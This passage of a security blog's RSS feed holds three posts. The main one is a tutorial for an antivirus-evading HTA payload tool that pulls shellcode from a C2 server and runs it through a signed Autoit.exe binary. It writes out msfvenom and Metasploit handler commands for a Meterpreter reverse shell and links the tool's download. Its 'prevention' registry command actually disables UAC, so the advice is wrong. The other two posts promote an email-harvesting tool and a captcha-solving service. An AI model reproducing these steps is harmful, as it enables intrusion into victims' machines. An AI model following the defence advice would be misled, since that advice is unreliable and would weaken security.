<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<p><strong><em>Note: This article is only for research and learning purposes. Anonyviet will not suffer any illegal acts!</em></strong></p>
<h2 id="ftoc-khai-niem-ngan-gon-ve-hta-va-phuong-thuc-tan-cong" class="ftwp-heading"><strong>The concept of HTA is brief and attack method</strong></h2>
<h3 id="ftoc-hta-la-gi" class="ftwp-heading"><strong>What is HTA?</strong></h3>
<p>HTA (HTML Application) is a type of HTML -based application developed by Microsoft, can be executed directly through <strong>mshta.exe</strong> without being restricted by the browser sandbox. Therefore, HTA has become a useful tool for legal automation tasks, but also a dangerous tool in the hacker hand</p>
<h3 id="ftoc-tai-sao-hta-co-the-bi-lam-dung" class="ftwp-heading"><strong>Why can HTA be abused?</strong></h3>
<ul>
<li><strong>Run with high rights</strong>: HTA can execute <strong>Vscrip/javascript</strong> With the user&#39;s rights without displaying a warning window like when running regular script</li>
<li><strong>No need to write the file</strong>: Hacker can download HTA remotely without storing toxic content on the victim&#39;s machine</li>
<li><strong>Ignore some security solutions</strong>: Some antivirus software do not scan HTA carefully like other execution files (.exe, .dll), creating BYPASS opportunities</li>
</ul>
<h2 id="ftoc-cach-thuc-hoat-dong-cua-payload-htamal" class="ftwp-heading"><strong>How to work for payload hamal</strong></h2>
<p>Hamal is a tool to create 1 payload <strong>HTA to execute Shellcode remotely</strong>helping to avoid being detected by Antivirus. The general process is as follows:</p>
<p><strong>Create HTA files containing toxic JavaScript code</strong></p>
<ul>
<li>In the source code of the tool, I disturbed Payload at the page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fobfuscator.io%2F" class="ext-link" rel="external nofollow" onclick="this.target='_blank';">https://obfuscator.io/</a>you can see the source code of Payload at the end in the Source Tool</li>
<li>Hamamal&#39;s Payload will change the file name, URL and execution command to HEX and 2 files: <strong>Autoit.exe and Loader.A3x</strong> encrypted by Xor algorithm. When Payload is executed on the victim&#39;s machine, it will decode and execute the command in the %appdata %folder</li>
</ul>
<p><strong>Download Shellcode from C2 server: </strong>When users open HTA files, script <strong>Loader.A3x</strong> Will take Shellcode from the hacker server</p>
<p><strong>Taking advantage of the valid digital signature (Digital signature) of the file Autoit.exe to bypass antivirus</strong></p>
<ul>
<li>I have compile script Loader.au3 to Loader.A3x, when running the command <strong>Autoit.exe Loader.A3x <hex_url_shellcode/></strong>  perform <strong>Download and execute Shellcode remote</strong>by using the functions <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Flearn.microsoft.com%2Fen-us%2Fwindows%2Fwin32%2Fapiindex%2Fwindows-api-list" class="ext-link" rel="external nofollow" onclick="this.target='_blank';">Windows API</a> To allocate memory, copy Shellcode into the granted memory area, then create a new stream to execute Shellcode.</li>
<li>One of the techniques <strong>Bypass antivirus (AV) </strong>popular is <strong>Take advantage of valid digital signatures of legal software</strong> To execute malicious code. In this case, I have <strong>Taking advantage of Autoit.exe with valid digital signature</strong> To avoid being detected by security software</li>
</ul>
<p><strong>Hamamal &#8211; Payloading tool for executing Shellcode remotely bypass antivirus</strong></p>
<p>To use this tool, you need to download Python to your computer, then download the source code of the tool <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.mediafire.com%2Ffile%2F8455ry5a5v2d24g%2FHtaMal.zip%2Ffile" class="ext-link" rel="external nofollow" onclick="this.target='_blank';">here</a>after downloading, you extract and experience (the decompression pass: anonyviet.com)</p>
<p>Before using Hamamal, we need to create a Shellcode, here I will use Metasploit to create with the statement:</p>
<p><code>msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin</code></p>
<p><code>#Setup môi trường lệnh tấn công</code></p>
<p><code>msfconsole</code></p>
<p><code>use exploit/multi/handler</code></p>
<p><code>set payload windows/x64/meterpreter/reverse_https</code></p>
<p><code>set lhost=your ip address</code></p>
<p><code>set lport=your port</code></p>
<p><code>run</code></p>
<p><img title="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#39;s discovery" loading="lazy" decoding="async" class="aligncenter size-full wp-image-80302" src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-1.png" alt="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#39;s discovery" width="600" height="89" srcset="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-1.png 600w, https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-1-300x45.png 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/></p>
<p>Next, run the Python3 -M Http.Server 80 command to open the file storage server <strong>shellcode.bin </strong>and python3 hamal.py to run the tool. Now I will enter the URL containing my shellcode<br /><img post-id="18179" fifu-featured="1" title="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#39;s discovery" loading="lazy" decoding="async" class="aligncenter size-full wp-image-80303" src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2.png" alt="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#039;s discovery" title="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#039;s discovery" width="990" height="401" srcset="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2.png 990w, https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2-300x122.png 300w, https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2-768x311.png 768w, https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2-750x304.png 750w" sizes="auto, (max-width: 990px) 100vw, 990px"/></p>
<p>That is done, now I will suppress the Payload <strong>hta_payload.hta</strong> into a zip file with a password of 123123@</p>
<p><img title="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#39;s discovery" loading="lazy" decoding="async" class="aligncenter size-full wp-image-80304" src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-3.png" alt="Hamamal: Shellcode execution technique from afar to overcome Antivirus&#39;s discovery" width="646" height="506" srcset="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-3.png 646w, https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-3-300x235.png 300w" sizes="auto, (max-width: 646px) 100vw, 646px"/></p>
<p>And here is the result:</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-80305" src="https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m.png" alt="A Screenshot of a Computer AI -GERATED Content may be incorrect." width="1598" height="923" srcset="https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m.png 1598w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-300x173.png 300w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-1024x591.png 1024w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-768x444.png 768w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-1536x887.png 1536w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-750x433.png 750w, https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m-1140x658.png 1140w" sizes="auto, (max-width: 1598px) 100vw, 1598px"/></p>
<p>Video demo:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="HtaMal" src="https://streamable.com/o/cd36kf#?secret=7yxcR1Anc4" data-secret="7yxcR1Anc4" frameborder="0" scrolling="no" width="1280" height="720"></iframe></p>
<h2 id="ftoc-cach-phong-chong-tan-cong-bang-hta" class="ftwp-heading"><strong>How to prevent attack with HTA</strong></h2>
<p>Because MSHTA.EXE is rarely necessary in the business environment, blocking Mshta.exe is a simple way to reduce the risk of being attacked. Can be done by:</p>
<p><code>Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0</code></p>
<p>Or in Group Policy:</p>
<ul>
<li><strong>Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies</strong></li>
<li>More <strong>mshta.exe</strong> Go to the blocked list</li>
</ul>
<p>Hamamal is a help to create a shellcode execution, using techniques <strong>Bypass antivirus (AV) </strong>To avoid being detected. By combining <strong>HTA (HTML Application)</strong> with <strong>Autoit</strong>this tool can execute malware directly in memory. However, the important thing to emphasize is <strong>Hamamal is only used for the purpose of security and legal testing</strong>.</p>
<p>To prevent BYPASS AV techniques like Hamamal, it is necessary:<br />🔹 Monitor suspected processes, especially Autoit.exe.<br />🔹 Limit the implementation of HTA on the system if not necessary.<br />🔹 Apply advanced protection mechanisms such as Application Whitelisting, Amsi Logging, and Behavioral Analysis.</p>
<p>👉 <strong>What do you think about this method? Is there any way to improve AV&#39;s detection to fight this technique? Please share your opinion! 🚀</strong></p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/hamamal-shellcode-execution-technique-from-afar-to-overcome-antiviruss-discovery/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile</title>
		<link>https://en.anonyviet.com/snov-io-email-finder-search-emails-with-only-company-name-domain-name-linkedin-profile/</link>
					<comments>https://en.anonyviet.com/snov-io-email-finder-search-emails-with-only-company-name-domain-name-linkedin-profile/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 14 Dec 2024 14:20:54 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[company]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[emails]]></category>
		<category><![CDATA[finder]]></category>
		<category><![CDATA[namedomain]]></category>
		<category><![CDATA[nameLinkedIn]]></category>
		<category><![CDATA[profile]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[Snov.io]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=17611</guid>

					<description><![CDATA[Are you tired of having to search for email addresses manually, wasting time and effort but not being effective? Let Snov.io Email Finder help you! This tool will help you find and verify email addresses quickly and accurately, helping you focus on more important things and improve work efficiency. Join the channel Telegram belong to [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Are you tired of having to search for email addresses manually, wasting time and effort but not being effective? Let <strong>Snov.io Email Finder</strong> help you! This tool will help you find and verify email addresses quickly and accurately, helping you focus on more important things and improve work efficiency.</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<h2 id="ftoc-snov-io-email-finder-la-gi" class="ftwp-heading"><strong>What is Snov.io Email Finder?</strong></h2>
<p><strong>Snov.io Email Finde</strong>r is a tool that helps you quickly find and verify email addresses, making it easier to connect with the right people. Whether you&#39;re doing sales marketing, recruiting, or simply want to expand your network, this tool allows you to search emails based on people&#39;s names, company domains, or even just a LinkedIn profile.</p>
<figure id="attachment_65540" aria-describedby="caption-attachment-65540" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65540 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1.jpg" alt="What is Snov.io Email Finder?" width="800" height="601" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1-300x225.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1-768x577.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1-750x563.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65540" class="wp-caption-text">What is Snov.io Email Finder?</figcaption></figure>
<h3 id="ftoc-tinh-nang-xac-thuc-thong-minh-cua-snov-io-email-finder" class="ftwp-heading"><strong>Snov.io Email Finder&#39;s smart authentication feature</strong></h3>
<p>Not only searching, Snov.io Email Finder also helps you authenticate email addresses, ensure emails you send to the correct recipient and avoid bounces. This helps:</p>
<ul>
<li>Your email does not fall into the spam box, Snov.io helps you remove non-existent email addresses.</li>
<li>Sending emails to the right recipients increases the likelihood that emails will be read and interacted with, bringing better results to your marketing campaign.</li>
<li>You don&#39;t need to waste time checking each email address manually.</li>
</ul>
<figure id="attachment_65541" aria-describedby="caption-attachment-65541" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65541 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2.jpg" alt="Snov.io Email Finder has a useful authentication feature" width="800" height="400" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2-768x384.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2-750x375.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65541" class="wp-caption-text">Snov.io Email Finder has a useful authentication feature</figcaption></figure>
<h3 id="ftoc-ket-noi-snov-io-voi-cac-cong-cu-khac" class="ftwp-heading"><strong>Connect Snov.io with other tools</strong></h3>
<p>Snov.io Email Finder can connect with many other tools, making your work more convenient:</p>
<ul>
<li>Connect with CRM to automatically update contact lists and manage customer information effectively.</li>
<li>Connect with email marketing tools like Mailchimp to create email lists and follow up effectively.</li>
<li>Combine with marketing automation tools to build an automatic customer search and contact process.</li>
</ul>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcach-hacker-bypass-av-xam-nhap-windows-voi-autoit%2F" class="local-link">How Hackers Bypass AV Infiltrate Windows with Autoit</a></strong></em></span></p>
<h2 id="ftoc-huong-dan-su-dung-snov-io-email-finder" class="ftwp-heading"><strong>Instructions for using Snov.io Email Finder</strong></h2>
<h3 id="ftoc-su-dung-tren-web" class="ftwp-heading"><strong>Use on the web</strong></h3>
<p>Usage is very simple, you just need to access<strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fsnov.io%2Femail-finder" class="ext-link" rel="external nofollow" onclick="this.target='_blank';"><span style="text-decoration: underline;">  Snov.io website</span></a></strong>  > Enter company name/ website/ person name > Click &#39;Find emails&#39; and you&#39;re done.</p>
<p><img title="Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile" loading="lazy" decoding="async" class="alignnone size-full wp-image-65542" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3.jpg" alt="Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile" width="800" height="460" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3-768x442.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3-750x431.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/></p>
<h3 id="ftoc-su-dung-qua-extension" class="ftwp-heading"><strong>Use via extension</strong></h3>
<p>You can install Snov.io Chrome Extension to easily search for email addresses when visiting any website</p>
<p><strong>Step 1:</strong> Go to the settings page<strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fchromewebstore.google.com%2Fdetail%2Femail-finder-by-snovio%2Feinnffiilpmgldkapbikhkeicohlaapj" class="ext-link" rel="external nofollow" onclick="this.target='_blank';"><span style="text-decoration: underline;">  Snov.io Chrome Extension</span></a></strong>  > Click Download</p>
<figure id="attachment_65543" aria-describedby="caption-attachment-65543" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65543 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4.jpg" alt="Download the Email Finder extension by Snov.io" width="800" height="133" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4-300x50.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4-768x128.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4-750x125.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65543" class="wp-caption-text">Download the Email Finder extension by Snov.io</figcaption></figure>
<p><strong>Step 2:</strong> Visit any company&#39;s website.</p>
<p><strong>Step 3:</strong> Activate the Email Finder utility. This utility will immediately start the email search process, and the results will be compiled in a separate list that you can easily customize with the appropriate title.</p>
<figure id="attachment_65544" aria-describedby="caption-attachment-65544" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65544 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5.jpg" alt="Activate the Email Finder utility" width="800" height="407" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5-300x153.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5-768x391.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5-750x382.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65544" class="wp-caption-text">Activate the Email Finder utility</figcaption></figure>
<p>Additionally, when you click on the &#39;Prospects&#39; section, you can explore the location of &#39;prospects&#39; within the company, you can also access their social network information (e.g. LinkedIn) , helps you get more contact information.</p>
<figure id="attachment_65545" aria-describedby="caption-attachment-65545" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65545 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6.jpg" alt="Discover the position of &#39;potential targets&#39; within the company" width="800" height="506" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6-300x190.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6-768x486.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6-750x474.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65545" class="wp-caption-text">Discover the position of &#39;potential targets&#39; within the company</figcaption></figure>
<h3 id="ftoc-tim-kiem-email-mien-phi-tren-linkedin-voi-li-prospect-finder" class="ftwp-heading"><strong>Search LinkedIn for free emails with LI Prospect Finder</strong></h3>
<p>Snov.io also offers another Chrome extension – LI Prospect Finder – that allows you to search emails on LinkedIn for free. This extension integrates directly with the LinkedIn search bar, making it easy to search for emails without having to manually navigate them.</p>
<p><strong>Step 1:</strong> To use, simply download <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fchromewebstore.google.com%2Fdetail%2Fli-prospect-finder%2Fmdhjhplkmldfjgoegbdmallcdhlecfcn" class="ext-link" rel="external nofollow" onclick="this.target='_blank';"><span style="text-decoration: underline;">LI Prospect Finder</span></a></strong>  > Go to LinkedIn and start searching.</p>
<figure id="attachment_65546" aria-describedby="caption-attachment-65546" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65546 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7.jpg" alt="Download LI Prospect Finder" width="800" height="155" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7-300x58.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7-768x149.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7-750x145.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65546" class="wp-caption-text">Download LI Prospect Finder</figcaption></figure>
<p><strong>Step 2:</strong> Enter the prospect&#39;s job title, apply filters (like People, Jobs, Connections, Locations, or Current Company) > Then activate the widget.</p>
<figure id="attachment_65547" aria-describedby="caption-attachment-65547" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65547 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8.jpg" alt="Enter the subject&#39;s job title" width="800" height="353" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8-300x132.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8-768x339.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8-750x331.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65547" class="wp-caption-text">Enter the subject&#39;s job title</figcaption></figure>
<p><strong>Step 3:</strong> Then, simply click &#39;Save&#39; to save the verified email addresses to a separate folder in the Snov.io web app.</p>
<figure id="attachment_65548" aria-describedby="caption-attachment-65548" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65548 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9.jpg" alt="Save verified email addresses" width="800" height="325" srcset="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9-300x122.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9-768x312.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9-750x305.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65548" class="wp-caption-text">Save verified email addresses</figcaption></figure>
<p>Why do you say it&#39;s been verified? That&#39;s because all of Snov.io&#39;s email search tools are equipped with a built-in Email Verifier tool, eliminating the need to manually check email validity,</p>
<p>Each email will have a colored dot next to it: Green means the email has been verified, yellow means the email needs to be reviewed, and red means the addresses do not exist.</p>
<p><span style="color: #339966;"><em><strong>See more:<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-active-burp-suite-pro-2024-bugbounty-pro-moi-nhat%2F" class="local-link"> Latest Active Burp Suite Pro 2024 + BugBounty Pro guide</a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p><strong>Snov.io Email Finder</strong> not just an email search tool, but a comprehensive solution that helps you connect with potential customers, build strong relationships, and grow your business. Experience it today!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/snov-io-email-finder-search-emails-with-only-company-name-domain-name-linkedin-profile/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Capsolver: Automatic solution solution for business</title>
		<link>https://en.anonyviet.com/capsolver-automatic-solution-solution-for-business/</link>
					<comments>https://en.anonyviet.com/capsolver-automatic-solution-solution-for-business/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 11 Dec 2024 22:55:48 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Automatic]]></category>
		<category><![CDATA[Business]]></category>
		<category><![CDATA[Capsolver]]></category>
		<category><![CDATA[Solution]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=17587</guid>

					<description><![CDATA[In the digital age, the automation of online tasks has become more popular than ever. However, the presence of Captcha &#8211; a test system to distinguish real users and BOT &#8211; often causes significant obstacles to this process. Do not worry, Capsolver came to solve this problem! Join the channel Telegram belong to Anonyviet 👉 [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In the digital age, the automation of online tasks has become more popular than ever. However, the presence of Captcha &#8211; a test system to distinguish real users and BOT &#8211; often causes significant obstacles to this process. Do not worry, <strong>Capsolver</strong> came to solve this problem!</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<h2 id="ftoc-noi-phien-toai-mang-ten-captcha" class="ftwp-heading"><strong>The &#8220;nuisance&#8221; called Captcha</strong></h2>
<p>In the world of digital technology is constantly developing, web automation and data collection (web scraping) have become an indispensable part. However, Captcha &#8211; a test system to distinguish real users and BOT &#8211; is a significant barrier that many developers face.</p>
<p>Whether you are building a BOT, collecting data or simply trying to automate repeated tasks online, Captcha may be a big obstacle. Therefore, Capsolver was born as an effective solution to overcome these difficulties.</p>
<figure id="attachment_66035" aria-describedby="caption-attachment-66035" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-66035 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1.jpg" alt="Capsolver helps overcome the obstacle of captcha" width="800" height="634" srcset="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1-300x238.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1-768x609.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-1-750x594.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-66035" class="wp-caption-text">Capsolver helps overcome the obstacle of captcha</figcaption></figure>
<p><span style="color: #339966;"><em><strong>See also: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky%2F" class="local-link">DNS Spy: DNS analysis tool of any domain</a></strong></em></span></p>
<h2 id="ftoc-capsolver-giai-phap-tu-dong-giai-captcha-hieu-qua" class="ftwp-heading"><strong>Capsolver: Effective Captcha solution solution</strong></h2>
<p><strong>Capsolver</strong> As an advanced service designed to solve Captcha automatically, helping you save time and effort. This platform supports a variety of captcha, including popular types such as Recaptcha, HCAPTCHA and even puzzles based on complex images.</p>
<p>What makes the difference of capsolver is the speed and accuracy &#8211; two important factors when you are processing automation on a large scale.</p>
<figure id="attachment_66036" aria-describedby="caption-attachment-66036" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-66036 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2.jpg" alt="Capsolver extension" width="800" height="380" srcset="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2-300x143.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2-768x365.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-2-750x356.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-66036" class="wp-caption-text">Capsolver extension</figcaption></figure>
<p>Capsolver provides easy -to -use APIs, allowing you to integrate the ability to solve captcha directly into your applications. Whether you are working with Python, JavaScript or any other programming language, Capsolver provides clear guidance documents to help you start quickly.</p>
<p>For example, you can easily integrate capsolver into a bot collecting product data on e -commerce website. When the BOT encounters Captcha, it will automatically send the request to Capsolver to solve and continue the data collection process without interrupted.</p>
<figure id="attachment_66037" aria-describedby="caption-attachment-66037" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-66037 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3.jpg" alt="Capsolver provides easy -to -use APIs" width="800" height="440" srcset="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3-300x165.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3-768x422.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-3-750x413.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-66037" class="wp-caption-text">Capsolver provides easy -to -use APIs</figcaption></figure>
<p>Capsolver homepage link: https://www.capsolver.com/</p>
